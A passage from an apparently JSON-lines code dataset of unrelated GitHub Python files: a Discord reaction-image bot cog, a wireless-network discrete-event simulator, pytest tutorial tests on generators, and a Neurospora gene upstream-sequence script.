\"https://i.imgur.com/ppcHtKd.png\",\n \"https://i.imgur.com/xy8iwN5.png\")\nIMAGES_KONKON = (\"http://safebooru.org/images/1856/6e6b3319f2a0a3fe5e77567ebdc998b3c4cb3900.jpg\",\n \"http://safebooru.org/samples/1832/sample_25adf8a37226fa003a6a6d7b0f3171f5764bba7d.jpg\",\n \"http://safebooru.org/images/1270/a9c1744fb4676f743c4dbc7668a39e72decdde16.jpg\",\n \"http://safebooru.org/images/2077/12bddb7bd2274f0ba9abe2d72c994555d562e0df.jpg\",\n (\"http://safebooru.org/samples/2045/\"\n \"sample_c2a906de7bf13b48c7c971e909f1beef75766c34.png\"))\nIMAGES_WAVE = (\"http://safebooru.org/images/2131/321680e22202367aebff73781458612269699518.jpg\",\n \"http://safebooru.org/images/531/94bee4c0ba0055eb531893c2b0b231e809b6a885.png\",\n \"http://safebooru.org/images/540/73530f81c9a2675df3ceb0faf0d4a6f97478b8a2.jpg\",\n \"http://safebooru.org/images/1753/93b7b450403c2d08cb73429356725242124fe5aa.png\",\n \"http://safebooru.org/images/1818/f9286e77a04f547d8da89349ebbdae8ad40286c0.jpg\",\n \"http://safebooru.org/images/1154/954c901ff38f9f294412c4f7cb416da42a5fdc05.jpg\")\nIMAGES_WHAT = (\"https://media.tumblr.com/tumblr_lnvtzjiY4J1qktqch.png\",\n \"https://owo.whats-th.is/a740f1.png\",\n \"http://media.tumblr.com/tumblr_lpob17Ru5v1qktqch.gif\")\n\nclass Reactions:\n \"\"\"Weeb reaction commands.\"\"\"\n\n def _generate_message(self, ctx, kind:str=None, user:discord.Member=None):\n \"\"\"Generate a message based on the user.\"\"\"\n if not kind or not user:\n message=\"\"\n elif ctx.bot.user.id == user.id:\n message=f\"Aw, thank you. Here, have one back. :3\"\n elif ctx.author.id != user.id:\n message=f\"**{user.display_name}**, you got a {kind} from **{ctx.author.display_name}!**\"\n else:\n message=f\"**{user.display_name}**, I'm so sorry. Have a {kind} anyway. :<\"\n return message\n\n async def _rra(self, ctx, kind:str, user:discord.Member=None):\n \"\"\"A helper function that grabs an image and posts it in response to a user.\n \n * kind - The type of image to retrieve.\n * user - The member to mention in the command.\"\"\"\n logger.info(f\"Fetching {kind} image.\")\n hash_id_channel = utils.to_hash(str(ctx.channel.id))\n url = BASE_URL_API.format(kind)\n async with ctx.bot.session.get(url) as response:\n if response.status == 200:\n data = await response.json()\n url_image = BASE_URL_IMAGE.format(data).replace(\"i/\", \"\")\n message = self._generate_message(ctx, kind, user)\n if not helpers.has_scanning(ctx):\n embed = discord.Embed(color=utils.random_color())\n embed.set_image(url=url_image)\n await ctx.send(message, embed=embed)\n else:\n message = \"\\n\".join([str(message), url_image])\n await ctx.send(message)\n else:\n message = \"Could not retrieve image. :(\"\n await ctx.send(message)\n logger.info(message)\n\n async def _send_image(self, ctx, url_image, kind:str=None, user:discord.Member=None):\n \"\"\"A helper function that creates an embed with an image and sends it off.\"\"\"\n if isinstance(url_image, (tuple, list)):\n url_image = systemrandom.choice(url_image)\n message = self._generate_message(ctx, kind, user)\n if not helpers.has_scanning(ctx):\n embed = discord.Embed(color=utils.random_color())\n embed.set_image(url=url_image)\n await ctx.send(message, embed=embed)\n else:\n message = \"\\n\".join([str(message), url_image])\n await ctx.send(message)\n\n # Commands based on _send_image()\n @commands.command(aliases=[\"rip\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def dead(self, ctx):\n \"\"\"Dead!\"\"\"\n await self._send_image(ctx, IMAGES_DEAD)\n\n @commands.command(aliases=[\"facedesk\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def fdesk(self, ctx):\n \"\"\"Facedesk!\"\"\"\n await self._send_image(ctx, IMAGE_FACEDESK)\n\n @commands.command(aliases=[\"tacklehug\", \"tackle\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def glomp(self, ctx, *, user:discord.Member):\n \"\"\"Glomp!\"\"\"\n await self._send_image(ctx, IMAGES_GLOMP, \"glomp\", user)\n\n @commands.command(aliases=[\"idek\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def idk(self, ctx):\n \"\"\"IDK!\"\"\"\n await self._send_image(ctx, IMAGES_IDK)\n\n @commands.command(aliases=[\"konkon\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def kon(self, ctx):\n \"\"\"Kon, kon!\"\"\"\n await self._send_image(ctx, IMAGES_KONKON)\n\n @commands.command(aliases=[\"lmly\", \"letmeloveyou\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lmlu(self, ctx):\n \"\"\"Let me love you!\"\"\"\n await self._send_image(ctx, IMAGE_LMLU)\n\n @commands.command(aliases=[\"boop\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def poke(self, ctx, *, user:discord.Member):\n \"\"\"Poke!\"\"\"\n await self._send_image(ctx, IMAGES_POKE, \"poke\", user)\n\n @commands.command(aliases=[\"waving\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def wave(self, ctx):\n \"\"\"Wakarimasen, lol!\"\"\"\n await self._send_image(ctx, IMAGES_WAVE)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def what(self, ctx):\n \"\"\"What?\"\"\"\n await self._send_image(ctx, IMAGES_WHAT)\n\n @commands.command(aliases=[\"idu\", \"ideu\", \"wakarimasenlol\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def wlol(self, ctx):\n \"\"\"Wakarimasen, lol!\"\"\"\n await self._send_image(ctx, IMAGE_WLOL)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def boots(self, ctx):\n \"\"\"Boots!\"\"\"\n await self._send_image(ctx, IMAGES_BOOTS)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def sandwich(self, ctx):\n \"\"\"Sandwich!\"\"\"\n await self._send_image(ctx, IMAGES_SANDWICHES)\n\n @commands.command(aliases=[\"tailwag\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def wag(self, ctx):\n \"\"\"Tail wag!\"\"\"\n await self._send_image(ctx, IMAGES_WAGGING)\n\n # Commands based on _rra()\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def cry(self, ctx):\n \"\"\"Cry!\"\"\"\n await self._rra(ctx, \"cry\")\n\n @commands.command(aliases=[\"snuggle\"])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def cuddle(self, ctx, *, user:discord.Member):\n \"\"\"Cuddle a user!\n \n * user - The user to be cuddled.\"\"\"\n await self._rra(ctx, \"cuddle\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def hug(self, ctx, *, user:discord.Member):\n \"\"\"Hug a user!\n \n * user - The user to be hugged.\"\"\"\n await self._rra(ctx, \"hug\", user)\n \n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def kiss(self, ctx, *, user:discord.Member):\n \"\"\"Kiss a user!\n \n * user - The user to be kissed.\"\"\"\n await self._rra(ctx, \"kiss\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lewd(self, ctx):\n \"\"\"Lewd!\"\"\"\n choice = bool(systemrandom.getrandbits(1))\n if choice:\n await self._rra(ctx, \"lewd\")\n else:\n await self._send_image(ctx, IMAGES_LEWD)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def lick(self, ctx, *, user:discord.Member):\n \"\"\"Lick a user!\n \n * user - The user to be licked.\"\"\"\n if hasattr(ctx.channel, \"is_nsfw\") and ctx.channel.is_nsfw():\n await self._rra(ctx, \"lick\", user)\n else:\n await self._send_image(ctx, IMAGES_LICK, \"lick\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def nom(self, ctx):\n \"\"\"Nom!\"\"\"\n await self._rra(ctx, \"nom\")\n\n @commands.command(aliases=['nya', 'meow'])\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def nyan(self, ctx):\n \"\"\"Nyan!\"\"\"\n await self._rra(ctx, \"nyan\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def owo(self, ctx):\n \"\"\"owo\"\"\"\n await self._rra(ctx, \"owo\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def pat(self, ctx, *, user:discord.Member):\n \"\"\"Pat a user!\n \n * user - The user to be patted.\"\"\"\n await self._rra(ctx, \"pat\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def pout(self, ctx):\n \"\"\"Pout!\"\"\"\n await self._rra(ctx, \"pout\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def slap(self, ctx, *, user:discord.Member):\n \"\"\"Slap a user!\n \n * user - The user to be slapped.\"\"\"\n await self._rra(ctx, \"slap\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def smug(self, ctx):\n \"\"\"Smug!\"\"\"\n await self._rra(ctx, \"smug\")\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def stare(self, ctx, *, user:discord.Member):\n \"\"\"Stare at a user!\n \n * user - The user to be stared at.\"\"\"\n await self._rra(ctx, \"stare\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def tickle(self, ctx, *, user:discord.Member):\n \"\"\"Tickle a user!\n \n * user - The user to be tickled.\"\"\"\n await self._rra(ctx, \"tickle\", user)\n\n @commands.command()\n @commands.cooldown(6, 12, commands.BucketType.channel)\n async def triggered(self, ctx):\n \"\"\"Triggered!\"\"\"\n await self._rra(ctx, \"triggered\")\n\ndef setup(bot):\n \"\"\"Setup function for reaction images.\"\"\"\n bot.add_cog(Reactions())\n","repo_name":"sokcheng/Kitsuchan-NG","sub_path":"cogs/reactions.py","file_name":"reactions.py","file_ext":"py","file_size_in_byte":16335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"20925737913","text":"#!/usr/bin/python\n\"\"\"\n\\brief Discrete-event simulation engine.\n\n\\author Thomas Watteyne \n\\author Kazushi Muraoka \n\\author Nicola Accettura \n\\author Xavier Vilajosana \n\"\"\"\n\n#============================ logging =========================================\n\nimport random\nimport logging\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nlog = logging.getLogger('SimEngine')\nlog.setLevel(logging.ERROR)\nlog.addHandler(NullHandler())\n\n#============================ imports =========================================\n\nimport threading\n\nimport Propagation\nimport Topology\nimport Mote\nimport SimSettings\nimport ReSFEngine\nimport numpy as np\nimport math\nimport copy\n\n#============================ defines =========================================\n\n#============================ body ============================================\n\nclass SimEngine(threading.Thread):\n\n #===== start singleton\n _instance = None\n _init = False\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(SimEngine,cls).__new__(cls, *args, **kwargs)\n return cls._instance\n #===== end singleton\n\n def __init__(self, cpuID=None, runNum=None, failIfNotInit=False):\n\n if failIfNotInit and not self._init:\n raise EnvironmentError('SimEngine singleton not initialized.')\n\n #===== start singleton\n if self._init:\n return\n self._init = True\n #===== end singleton\n\n # store params\n self.cpuID = cpuID\n self.runNum = runNum\n\n self.rect1 = (0.0, 0.9, 3.0, 1.1)\n self.rect2 = (2.0, 1.9, 5.0, 2.1)\n self.rect3 = (0.0, 2.9, 3.0, 3.1)\n self.rect4 = (2.0, 3.9, 5.0, 4.1)\n\n # self.originX = 2.5 # in km\n # self.originY = 4.7 # in km\n # self.targetX = 4.5 # in km\n # self.targetY = 4.6 # in km\n\n # first one is the origin\n self.targets = [(4.6, 4.6), (0.9, 3.95), (4.6, 2.95), (0.9, 1.95), (4.6, 0.95)]\n # self.targets = [(1.0, 3.7), (4.0, 2.7), (1.0, 1.7), (4.5, 0.5)]\n # self.targets = [(4.0, 2.7), (1.0, 1.7), (4.5, 0.5)]\n self.targetType = {}\n\n self.targetRadius = 0.100 # in km\n self.targetPos = {} # dict: mote -> (x, y) relative to workingTargetX\n self.targetIndex = {}\n self.margin = 0.02\n self.goalDistanceFromTarget = 0.01\n\n # local variables\n self.dataLock = threading.RLock()\n self.pauseSem = threading.Semaphore(0)\n self.simPaused = False\n self.goOn = True\n self.asn = 0\n self.startCb = []\n self.endCb = []\n self.events = []\n self.settings = SimSettings.SimSettings()\n random.seed(self.settings.seed)\n np.random.seed(self.settings.seed)\n self.genMobility = random.Random()\n self.genMobility.seed(self.settings.seed)\n self.propagation = Propagation.Propagation()\n self.ReSFEngine = None\n if self.settings.sf == 'resf':\n self.ReSFEngine = ReSFEngine.ReSFEngine()\n self.motes = [Mote.Mote(id) for id in range(self.settings.numMotes)]\n self.topology = Topology.Topology(self.motes)\n self.topology.createTopology()\n\n # Not valid values. Will be set by the last mote that converged.\n self.asnInitExperiment = 999999999\n self.asnEndExperiment = 999999999\n\n self.dedicatedCellConvergence = 99999999\n\n # # boot all motes\n # for i in range(len(self.motes)):\n # self.motes[i].boot()\n\n self.motes[0].boot()\n\n # initialize parent class\n threading.Thread.__init__(self)\n self.name = 'SimEngine'\n\n def destroy(self):\n # destroy the propagation singleton\n self.propagation.destroy()\n\n # destroy my own instance\n self._instance = None\n self._init = False\n\n #======================== thread ==========================================\n\n def getTrafficPeriod(self):\n pick = -1.0\n trafficAverage = self.settings.pkPeriod\n trafficStd = trafficAverage / 4\n while pick <= 0.0:\n pick = np.random.normal(trafficAverage, trafficStd, None)\n if pick < trafficAverage:\n pick = math.ceil(pick)\n else:\n pick = math.floor(pick)\n return pick\n\n def run(self):\n \"\"\" event driven simulator, this thread manages the events \"\"\"\n\n # log\n log.info(\"thread {0} starting\".format(self.name))\n\n # schedule the endOfSimulation event if we are not simulating the join process\n if not self.settings.withJoin:\n if not self.settings.convergeFirst:\n self.scheduleAtAsn(\n asn = self.settings.slotframeLength*self.settings.numCyclesPerRun,\n cb = self._actionEndSim,\n uniqueTag = (None,'_actionEndSim'),\n )\n else:\n self.scheduleAtAsn(\n asn = self.settings.slotframeLength*self.settings.maxToConverge,\n cb = self._actionEndSim,\n uniqueTag = (None,'_actionEndSim'),\n )\n\n if self.settings.trafficGenerator == 'pick':\n periods = None\n if self.settings.trafficFrequency == 'short':\n periods = [200, 400, 600] # 3s, 6s, 9s\n elif self.settings.trafficFrequency == 'medium':\n periods = [2000, 3000, 4000] # 30s, 45s, 60s\n elif self.settings.trafficFrequency == 'long':\n periods = [20000, 30000, 40000] # 5 min (300s), 7.5 min (450s), 10 min (600s)\n\n # periods = [200, 500, 1000, 3000, 6000, 12000]\n # periods = [200, 400, 600, 800, 1000]\n # periods = [200]\n # slotduration = 0.015, [3.0, 7.5, 15.0, 45.0, 90.0, 180.0] seconds\n # slotduration = 0.010, [2.0, 5.0, 10.0, 30.0, 60.0, 120.0] seconds\n for m in self.motes:\n if m.id > 0:\n m.startApp = random.randint(0, 6000)\n m.pkPeriod = periods[random.randint(0, len(periods)-1)] * float(self.settings.slotDuration)\n log.info(\"Mote {0}, theoretical start delay = {1}, period = {2}.\".format(m.id, m.startApp, m.pkPeriod))\n\n sporadics = [4000, 6000, 8000]\n for m in self.motes:\n if m.id > 0:\n m.sporadic = sporadics[random.randint(0, len(sporadics)-1)] * float(self.settings.slotDuration)\n m.sporadicStart = random.randint(0, 2000)\n log.info(\"Mote {0}, sporadic sending first = {1}.\".format(m.id, m.sporadic))\n elif self.settings.trafficGenerator == 'normal':\n for m in self.motes:\n if m.id > 0:\n m.startApp = random.randint(0, 6000)\n m.pkPeriod = self.getTrafficPeriod()\n log.info(\"Mote {0}, theoretical start delay = {1}, period = {2}.\".format(m.id, m.startApp, m.pkPeriod))\n else:\n assert False\n\n\n if self.settings.mobilityModel == 'RPGM':\n for m in range(0, self.settings.numMotes):\n self.targetPos[m] = (\n self.targets[1][0] + self.genMobility.uniform((-1.0 * self.targetRadius) + 0.005, self.targetRadius - 0.005),\n self.targets[1][1] + self.genMobility.uniform((-1.0 * self.targetRadius) + 0.005, self.targetRadius - 0.005))\n self.targetIndex[m] = 1\n self.targetType[m] = 'up'\n\n # call the start callbacks\n for cb in self.startCb:\n cb()\n\n # for m in self.motes:\n # log.info(\n # \"[topology] shortest mote to {0} is {1}.\".format(m.id, m.closestNeighbor.id),\n # )\n\n # consume events until self.goOn is False\n while self.goOn:\n\n with self.dataLock:\n\n # abort simulation when no more events\n if not self.events:\n log.info(\"end of simulation at ASN={0}\".format(self.asn))\n break\n\n # make sure we are in the future\n (a, b, cb, c) = self.events[0]\n if c[1] != '_actionPauseSim':\n assert self.events[0][0] >= self.asn\n\n # update the current ASN\n self.asn = self.events[0][0]\n\n # if self.asn == 10000:\n # self._actionPauseSim()\n\n interval = 4\n newCycle = int(self.getAsn() / self.settings.slotframeLength)\n index = newCycle / interval\n if newCycle % interval == 0 and index < len(self.motes) and self.motes[index].isJoined == False:\n self.motes[index].boot()\n log.info(\"Booting node {0}\".format(index))\n\n if self.asn % self.settings.slotframeLength == 0:\n # rdm = self.propagation.print_random()\n # log.info(\"topology random={0}\".format(rdm))\n log.info(\"[6top] ----------- SLOTFRAME BEGIN -----------\")\n\n # only start moving when the experiment started, there is a mobility model and do it at the beginning of every cycle\n if self.asn > self.asnInitExperiment and self.settings.mobilityModel != 'none' and self.asn % self.settings.slotframeLength == 0:\n if self.settings.mobilityModel == 'RWM': # random walk model\n for m in self.motes:\n if m.id != 0:\n m.updateLocation()\n elif self.settings.mobilityModel == 'RPGM':\n for m in self.motes:\n m.updateLocation()\n self.topology.updateTopology()\n for m in self.motes:\n m._tsch_updateMinimalCells() # update the neighbors of the minimal cells\n\n if self.settings.sf == 'resf':\n self.ReSFEngine.action()\n\n # call callbacks at this ASN\n while True:\n if self.events[0][0]!=self.asn:\n break\n (_,_,cb,_) = self.events.pop(0)\n cb()\n\n # call the end callbacks\n for cb in self.endCb:\n cb()\n\n # log\n log.info(\"thread {0} ends\".format(self.name))\n\n #======================== public ==========================================\n\n # called when there is dedicated cell or ReSF convergence\n def startSending(self):\n\n if self.settings.sf == 'resf':\n # this is called when ReSF reservations all arrived at root\n\n assert self.dedicatedCellConvergence != 99999999\n # offset until the end of the cycle where the dedicated cell convergence happened, just as we do with the other SFs\n offset = self.settings.slotframeLength - (self.dedicatedCellConvergence % self.settings.slotframeLength)\n\n for m in self.motes:\n if m.id > 0:\n delay = (offset + m.startApp)\n log.info(\"Current ASN: {0}\".format(self.asn))\n log.info(\"Mote {0} would theoretically (convergence + offset + delay start) start at ASN {1}, period of {2}.\".format(m.id, self.dedicatedCellConvergence + delay, m.pkPeriod))\n\n startTransmission = self.dedicatedCellConvergence + delay\n while startTransmission <= self.asn:\n startTransmission += int(m.pkPeriod / float(self.settings.slotDuration))\n log.info(\"Mote {0}, will start at ASN {1}, period of {2}.\".format(m.id, startTransmission,\n int(m.pkPeriod / float(\n self.settings.slotDuration))))\n\n # delay *= float(self.settings.slotDuration)\n # schedule the transmission of the first packet\n self.scheduleAtAsn(\n asn=startTransmission,\n cb=m._app_action_sendSinglePacket,\n uniqueTag=(m.id, '_app_action_sendSinglePacket'),\n priority=2,\n )\n if self.settings.sporadicTraffic == 1:\n self.scheduleAtAsn(\n asn=startTransmission + m.sporadicStart,\n cb=m._app_action_sendSporadicPacket,\n uniqueTag=(m.id, '_app_action_sendSporadicPacket'),\n priority=2,\n )\n else:\n # offset until the end of the current cycle\n offset = self.settings.slotframeLength - (self.asn % self.settings.slotframeLength)\n for m in self.motes:\n if m.id > 0:\n delay = (offset + m.startApp)\n log.info(\"Mote {0}, will start at ASN {1}, period of {2}.\".format(m.id, self.getAsn()+delay, m.pkPeriod))\n delay *= float(self.settings.slotDuration)\n # schedule the transmission of the first packet\n self.scheduleIn(\n delay=delay,\n cb=m._app_action_sendSinglePacket,\n uniqueTag=(m.id, '_app_action_sendSinglePacket'),\n priority=2,\n )\n if self.settings.sporadicTraffic == 1:\n self.scheduleIn(\n delay=delay + (m.sporadicStart*float(self.settings.slotDuration)),\n cb=m._app_action_sendSporadicPacket,\n uniqueTag=(m.id, '_app_action_sendSporadicPacket'),\n priority=2,\n )\n\n\n def checkValidPosition(self, xcoord, ycoord, countSquare=True, placement=False):\n '''\n Checks if a given postition is valid when moving\n '''\n\n margin = self.margin\n if placement:\n margin = 0.02\n\n inSquare = False # total area\n insideObstacle1 = False # rectangle 1\n insideObstacle2 = False # rectangle 2\n insideObstacle3 = False # rectangle 1\n insideObstacle4 = False # rectangle 2\n if countSquare:\n if (xcoord < self.settings.squareSide and ycoord < self.settings.squareSide) and (\n xcoord > 0 and ycoord > 0):\n inSquare = True\n else:\n inSquare = True\n\n if (xcoord < (self.rect1[2] + margin)) and (ycoord > (self.rect1[1] - margin) and (ycoord < (self.rect1[3] + margin))):\n insideObstacle1 = True\n if (xcoord > (self.rect2[0] - margin)) and (ycoord > (self.rect2[1] - margin) and (ycoord < (self.rect2[3] + margin))):\n insideObstacle2 = True\n if (xcoord < (self.rect3[2] + margin)) and (ycoord > (self.rect3[1] - margin) and (ycoord < (self.rect3[3] + margin))):\n insideObstacle3 = True\n if (xcoord > (self.rect4[0] - margin)) and (ycoord > (self.rect4[1] - margin) and (ycoord < (self.rect4[3] + margin))):\n insideObstacle4 = True\n\n if inSquare and not insideObstacle1 and not insideObstacle2 and not insideObstacle3 and not insideObstacle4:\n return True\n else:\n return False\n\n #=== scheduling\n\n def scheduleAtStart(self,cb):\n with self.dataLock:\n self.startCb += [cb]\n\n def scheduleIn(self,delay,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n \"\"\" used to generate events. Puts an event to the queue \"\"\"\n\n with self.dataLock:\n asn = int(self.asn+(float(delay)/float(self.settings.slotDuration)))\n\n self.scheduleAtAsn(asn,cb,uniqueTag,priority,exceptCurrentASN)\n\n def scheduleAtAsn(self,asn,cb,uniqueTag=None,priority=0,exceptCurrentASN=True):\n \"\"\" schedule an event at specific ASN \"\"\"\n\n # make sure we are scheduling in the future\n assert asn>self.asn\n\n # remove all events with same uniqueTag (the event will be rescheduled)\n if uniqueTag:\n self.removeEvent(uniqueTag,exceptCurrentASN)\n\n with self.dataLock:\n\n # find correct index in schedule\n i = 0\n while i Generator[T, None, None]:\n \"\"\"Return a simple generator that only yields values in reverse.\"\"\"\n for index in range(len(data) - 1, -1, -1):\n yield data[index]\n\n\ndef test_generator_for() -> None:\n \"\"\"Iterating through a generator in a `for` loop.\"\"\"\n reversed_str: List[str] = []\n for char in reverse(\"golf\"):\n reversed_str.append(char)\n assert \"\".join(reversed_str) == \"flog\"\n\n assert \"\".join(reverse(\"golf\")) == \"flog\"\n\n\ndef test_generator_manual() -> None:\n \"\"\"Iterating through a generator manually.\"\"\"\n reversed_int: List[int] = []\n\n generator = reverse([1, 2, 3])\n reversed_int.append(next(generator))\n reversed_int.append(next(generator))\n reversed_int.append(next(generator))\n\n with pytest.raises(StopIteration):\n next(generator)\n\n assert reversed_int == [3, 2, 1]\n\n\ndef test_generator_send() -> None:\n \"\"\"Interact with a generator using its `send()` method.\"\"\"\n\n def reverse_send() -> Generator[int, int, str]:\n \"\"\"Return a generator that produces `int`s in descending order.\"\"\"\n start = yield 0\n for index in range(start, -1, -1):\n yield index\n\n return \"done\"\n\n reversed_int: List[int] = []\n\n generator = reverse_send()\n # The first `send()` to start the generator must be a `None`.\n assert generator.send(None) == 0\n\n reversed_int.append(generator.send(3))\n for num in generator:\n reversed_int.append(num)\n\n assert reversed_int == [3, 2, 1, 0]\n\n\ndef test_generator_echo() -> None:\n \"\"\"Generator yield, send and return types.\"\"\"\n\n def echo_round() -> Generator[int, float, str]:\n \"\"\"Round `float` that is sent in to the nearest `int`.\"\"\"\n sent = yield 0\n while sent >= 0:\n sent = yield round(sent)\n return \"Done\"\n\n generator = echo_round()\n assert next(generator) == 0\n\n assert generator.send(1.1) == 1\n assert generator.send(1.6) == 2\n\n with pytest.raises(StopIteration) as ex_info:\n generator.send(-1)\n assert \"Done\" in str(ex_info.value)\n\n\ndef test_generator_expressions() -> None:\n \"\"\"Generator expression as a succinct form of generator function.\"\"\"\n data = \"golf\"\n # This generator expression is essentially the same as the reverse() function above.\n reverse_generator: Generator[str, None, None] = (\n data[i] for i in range(len(data) - 1, -1, -1)\n )\n\n assert next(reverse_generator) == \"f\"\n assert next(reverse_generator) == \"l\"\n assert next(reverse_generator) == \"o\"\n assert next(reverse_generator) == \"g\"\n\n with pytest.raises(StopIteration):\n next(reverse_generator)\n\n\ndef test_gen_expr_maths() -> None:\n \"\"\"Some mathematical operations implemented with generator expressions.\"\"\"\n # Sum of squares\n squares_generator: Generator[int, None, None] = (i * i for i in range(10))\n assert sum(squares_generator) == sum((1, 4, 9, 16, 25, 36, 49, 64, 81))\n\n # Dot product\n x_vector: Tuple[int, int, int] = (1, 3, 5)\n y_vector: Tuple[int, int, int] = (2, 4, 6)\n assert sum(x * y for x, y in zip(x_vector, y_vector)) == 44\n\n\ndef test_gen_expr_unique_words() -> None:\n \"\"\"Using a generator expression to find unique words in a file.\"\"\"\n sample_file: Path = Path(__file__).parent.joinpath(\"sample.txt\")\n with open(sample_file) as file:\n unique_words: Set[str] = set(words for line in file for words in line.split())\n\n assert unique_words == {\"line\", \"one\", \"two\", \"three\"}\n\n\ndef test_gen_expr_named_tuples() -> None:\n \"\"\"Using a generator expression with named tuples.\"\"\"\n Student = NamedTuple(\"Student\", [(\"gpa\", float), (\"name\", str)])\n graduates: List[Student] = [\n Student(gpa=3.5, name=\"Tallys\"),\n Student(gpa=3.8, name=\"Kaniya\"),\n Student(gpa=3.7, name=\"Toibe\"),\n ]\n\n valedictorian = max((student.gpa, student.name) for student in graduates)\n assert valedictorian == (3.8, \"Kaniya\")\n","repo_name":"jashburn8020/the-python-tutorial","sub_path":"src/ch09/generators_test.py","file_name":"generators_test.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72073244388","text":"#This is redundant with UpstreamFinder.py and other RStudio scripts!\nprint('This is redundant with UpstreamFinder.py and other RStudio scripts!')\n\n#same as UpstreamFinder.py, but only counts gene for vvd if up/downreg isnt seen in wt.\n#Thereofre, select for uniques.\n\n\nimport sys\n\ntry:\n DEfile = open(\"/Users/langyy/Desktop/Differential_expression/DEgenes_tables/DEgenes_vvd25_0_4.txt\",'r') #vvd here.\n DEfile2 = open(\"/Users/langyy/Desktop/Differential_expression/DEgenes_tables/DEgenes_wt25_0_4.txt\",'r') #wt here.\n upstreamfile = open(\"/Users/Neurospora/Desktop/Joseph_Things/NC_Upstream.fasta\",'r')\n outputfile = open(\"UpstreamFound_vvd25_0_4_corrected.txt\", \"w\") #Added 'corrected' to name of file\n namesoutput = open(\"UpstreamFound_vvd25_0_4_names.txt\", \"w\")\n\nexcept:\n print(\"Files not found: Probably wrong directory.\")\n sys.exit()\n\nvalidletters = \"UBDubd\"\nupordown2 = input(\"Up or Down reg or both? (U/D/B) : \")\nif upordown2 in validletters:\n print(\"Assuming \", upordown2.upper(), sep='')\nelse:\n print(\"Please only use single-letter option U/B/D.\")\n sys.exit()\nupordown = upordown2.upper()\nnumberlist = []\nnumberlist1 = []\nnumberlist2 = []\nWholeFile1 = {}\nWholeFile2 = {}\nnumba = \"test\"\nsequence = \"also test\"\nsequencedict = {}\nnumber = str\n\n\nfor line in DEfile:\n if line.startswith(\"\\\"NCU\"):\n data = line.split(\" \")\n number = (data[0])[1:-1]\n numberlist1.append(number)\n WholeFile1[(data[0])[1:-1]] = data[2]\nfor line in DEfile2:\n if line.startswith(\"\\\"NCU\"):\n data = line.split(\" \")\n number = (data[0])[1:-1]\n numberlist2.append(number)\n WholeFile2[(data[0])[1:-1]] = data[2]\n\nduplicatecounter1 = 0\nduplicatecounter2 = 0\nfor u in range(0, len(numberlist1)):\n if numberlist1[u] in numberlist2:\n duplicatecounter1 += 1\n\n if (float(WholeFile1[numberlist1[u]])- float(WholeFile2[numberlist1[u]])) >= 1 and (upordown == 'U' or upordown == 'B'):\n print(numberlist1[u], \" has been upregulated.\", sep = '')\n elif (float(WholeFile1[numberlist1[u]])- float(WholeFile2[numberlist1[u]])) <= -1 and (upordown == 'D' or upordown == \"B\"):\n print(numberlist1[u], \" has been downregulated.\", sep='')\n numberlist.append(numberlist1[u])\n elif float(WholeFile1[numberlist1[u]]) >= 1 and (upordown == 'U' or upordown == 'B'):\n numberlist.append(numberlist1[u])\n duplicatecounter2 += 1\n elif float(WholeFile1[numberlist1[u]]) <= -1 and (upordown == 'D' or upordown == 'B'):\n numberlist.append(numberlist1[u])\n duplicatecounter2 += 1\n\n\n##make dictionary for NCU numnbers and upstream elements.\nfor line in upstreamfile:\n if line.startswith(\">\"):\n sequencedict[numba] = ''.join(sequence)\n sequence = []\n data = line.split(\" \")\n numba = (data[1])[1:-1]\n else:\n sequence.append((line).strip())\n\ncounterforfailmatch = 0\nfailedmatchnumbers = []\nfor i in range(0, len(numberlist)):\n if numberlist[i] in sequencedict:\n print(\">\", str(numberlist[i]), \"\\n\", sequencedict[str(numberlist[i])], sep = '', file = outputfile)\n print(numberlist1[i], \"\\n\", sep = '', file = namesoutput)\n else:\n counterforfailmatch += 1\n failedmatchnumbers.append(numberlist[i])\nprint(\"Reduced from \", len(numberlist1), \" to \", len(numberlist))\nprint(\"Number of upstream elements found successfully: \", len(numberlist) - counterforfailmatch)\nprint(\"Number of failed matches: \", counterforfailmatch, \"\\nAccession numbers of failed matches: \", 